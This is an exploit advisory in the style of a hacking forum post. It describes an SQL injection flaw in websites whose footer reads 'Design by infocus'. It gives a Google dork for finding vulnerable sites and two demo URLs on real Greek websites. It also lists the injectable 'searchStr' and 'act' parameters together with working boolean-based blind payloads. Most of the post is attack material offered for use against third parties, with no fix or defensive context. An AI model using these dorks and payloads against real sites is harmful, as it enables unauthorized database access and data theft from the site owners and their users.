#################################################################################
# Exploit Title: Grecee İnfocus Sql İnjection Vulnerability
# Author : TrazeR  & AKINCİLAR
# Google Dork : intext:"Design by infocus."  inurl:searchStr site:gr OR => intext:"Design by infocus."  inurl:catId site:gr
# Tested on : Kali Linux 2018.1
# Date : 29.04.2018
# Vendor Home: http://www.infocus.gr/
# Blog : http://www.trazer.org/
# Forum : http://www.cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~# Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel 
[+] GET parameter 'searchStr' is vulnerable
[+] GET parameter 'act' is vulnerable

Demo: http://www.e-pili.gr/index.php?searchStr=&act=viewCat

Parameter: searchStr (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: searchStr=-8957) OR MAKE_SET(4369=4369,3525)-- mpjl&act=viewCat

Demo 2 :  http://www.lagomandranakis.gr/index.php?act=viewCat&catId=7

Parameter: act (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: act=-4107) OR MAKE_SET(8921=8921,2739)-- Avuf&catId=7


[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]